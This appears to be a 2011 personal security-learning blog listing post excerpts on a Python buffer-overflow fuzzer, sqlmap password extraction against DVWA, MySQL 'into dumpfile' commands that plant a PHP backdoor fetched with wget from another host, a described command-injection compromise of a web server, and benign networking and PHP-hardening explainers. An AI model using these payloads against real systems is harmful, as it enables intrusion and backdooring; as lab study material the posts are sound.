Posts

Showing posts from 2011

SEH Based Buffer Overflow

Image
This time I will   tell you about   buffer   overflow   that occurs   in the File   Sharing   Wizard  application, this firs time I learn about buffer overflow. we 'll   get a   buffer   overflow   when   we   send  to that aplication  2000   bytes of data, this the sample fuzzer with python  : import socket import sys ips = '192.168.56.101' port = 80 string = "A" * 2000 print "[!] Launching Remote BoF on", ips,",hang on tight!" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect=s.connect((ips, port)) except: print "[-] Oops! Cannot establish connection..\r\n" sys.exit(1) print "[*] Sending evil payload..\r\n" print "[*] Done! Check your debugger.." payload = ( 'HEAD %s HTTP/1.0\r\n' '\r\n') % (string) s.send(payload) s.close() whit that fuzzer aplication will crash but EIP not overwrite bicause this aplication protected whit SEH, we can see that with SEH chain menu in debugger : ...

Create Backdoor From Sql Injection

Image
To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple : root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password after we got the password, now we enter to mysql with the following sintax: root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p  then press enter and input the password we got. now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web : mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --; Query OK, 1 row affected (0.00 sec) now we ...

sock proxy

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. Socks5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded. Comparison with HTTP Proxying SOCKS operates at a lower level than HTTP proxying: SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make and may be used for any form of TCP or UDP socket connection, whereas an HTTP proxy takes an HTTP request and forwards it to an HTTP server. Though HTTP proxying has a different use-case in mind, the CONNECT method allows one to forward TCP connections, there is however no mechanism for UDP proxying.

Server Exploit (local exploit)

This time I will write about the exploit servers , the exploit I do over the web is there in , and the web has vulner . I did the following steps :   First , I did a scan of the web to find out what applications are used , and I get the web using wordpress and xampp server applications , since both use the latest version so I do not get vurner . Second , I find that there are vulner used in gadgets , and I found a gadget for the vulner ping an ip , after my tests I found that I can run a variety of commant therein . Third , I wrote commant that serves to download a backdoor that I had prepared . and my backdoor successful entry into the web. F ourth , after a backdoor embedded it is time to find where the location of the embedded backdoor , it's not hard to do because we can use the vulner commant execution had to look for it . after found it, I open the backdoor. until...

Filesystem permissions

Most current file systems have methods of administering permissions or access rights to specific users and groups of users. These systems control the ability of the users affected to view or make changes to the contents of the filesystem. Traditional Unix permissions Permissions on Unix-like systems are managed in three distinct classes . These classes are known as user , group , and others . In effect, Unix permissions are a simplified form of access control lists (ACLs). When a new file is created on a Unix-like system, its permissions are determined from the umask of the process that created it. Classes Files and directories are owned by a user. The owner determines the file's owner class . Distinct permissions apply to the owner. Files and directories are assigned a group, which define the file's group class. Distinct permissions apply to members of the file's group members. The owner doesn't need to be a member of the file's group. Users who are not the...

Building and Exploiting System

In this case i learn to built system and

PHP Suhosin

Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts, that can be used separately or in combination. The first part is a small patch against the PHP core, that implements a few low-level protections against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections. Suhosin is an open source patch for PHP. "The goal behind Suhosin is to be a safety net that protects servers from insecure PHP coding practices." In some Linux distributions (notably Debian and Ubuntu) it is shipped by default. why is suhosin called suhosin ? According to some blog entries a few korean people are kinda suprised about the name. They wonder why a german developer has choosen a korean word for his project’s name. The reason for this is very simp...

Subnet

A subnet allows the flow of network traffic between hosts to be segregated based on a network configuration. By organizing hosts into logical groups, subnetting can improve network security and performance. Subnet Mask Perhaps the most recognizable aspect of subnetting is the subnet mask . Like IP addresses, a subnet mask contains four bytes (32 bits) and is often written using the same "dotted-decimal" notation. For example, a very common subnet mask in its binary representation 11111111 11111111 11111111 00000000 is typically shown in the equivalent, more readable form 255.255.255.0 Applying a Subnet Mask A subnet mask neither works like an IP address, nor does it exist independently from them. Instead, subnet masks accompany an IP address and the two values work together. Applying the subnet mask to an IP address splits the address into two parts, an "extended network address" and a host address. For a subnet mask to be valid, its leftmost bits mus...

Bypass HTML Field Restrictions

This time I learn about Bypass HTML Field Restrictions. I bypass the html form . In order to pass this lesson , I must submit the form with each field containing the value of unallowed . I have to submit an invalid value for all six fields in one delivery form provided . that is : select field which has two choices , radio button which has two choices , input field which retricted to 5 character, and disableinput field with a form that can not be filled . And this some way that I have tried to bypass it : First I submibt that form as usual and I did not find any change Then I tried to intercept request by webscarab, I change values that not provided there. but I not find any changes too. I studied again after it there are only 5 fields in the request when the procedure mentioned there are 6 fields . then I add a new field that is itself disableinput field , the parameter I get from the source web page . but I not find ...

Installing Webgoat in Backtrack

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson. 1. Before installing firs download webgoat from this link  . 2. To   extract   the   file   format   7zip, install p7zip by :     apt-get install p7zip 3. Now extract webgoat file :      p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z 4.  if   the   extract   has been completed , go   into the   folder   extract :     cd  WebGoat-OWASP_Standard-5.3_RC1 5.  change the   file p...

SQL injection

This time I will tell you a little about sql injection I am studying . I learned to direct practice in DVWA ( Damn Vulnerable Web Applicaion ) . I started from a low level , and here are the php syntax that must be injected : " <?php     if(isset( $_GET [ 'Submit' ])){      // Retrieve data      $id  =  $_GET [ 'id' ];      $getid  =  "SELECT first_name, last_name FROM users WHERE user_id = ' $id '" ;      $result  =  mysql_query ( $getid ) or die( '<pre>'  .  mysql_error () .  '</pre>'  );      $num  =  mysql_numrows ( $result );      $i  =  0 ;     while ( $i  <  $num ) {          $fir...